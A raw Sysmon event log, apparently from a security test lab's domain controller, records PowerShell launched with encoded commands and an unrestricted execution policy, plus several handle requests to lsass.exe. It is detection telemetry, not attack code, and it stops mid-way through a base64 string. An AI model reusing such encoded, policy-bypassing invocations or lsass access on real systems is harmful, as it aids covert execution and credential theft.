65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.739{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.739{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.739{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.692{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.692{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.661{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nem3523h.vuw.ps12020-11-03 15:53:04.661 10341000x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.645{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.630{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.614{D28789B6-7CE0-5FA1-3201-000000008801}37403432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|UNKNOWN(00007FF931D4331B)|UNKNOWN(00007FF9311E41A5)|UNKNOWN(00007FF9311E3E76)|UNKNOWN(00007FF931C954DB)|UNKNOWN(00007FF9311A4A0C)|UNKNOWN(00007FF931202EDB)|UNKNOWN(00007FF9311E6540)|UNKNOWN(00007FF9311E6540)|UNKNOWN(00007FF9311E63D1)|UNKNOWN(00007FF9311D8356)|UNKNOWN(00007FF9311E4889)|UNKNOWN(00007FF9311E447C)|UNKNOWN(00007FF9311E41A5)|UNKNOWN(00007FF9311E3E76)|UNKNOWN(00007FF931C954DB)|UNKNOWN(00007FF9311CACD7)|UNKNOWN(00007FF9311CA2A7) 154100x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.627{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARw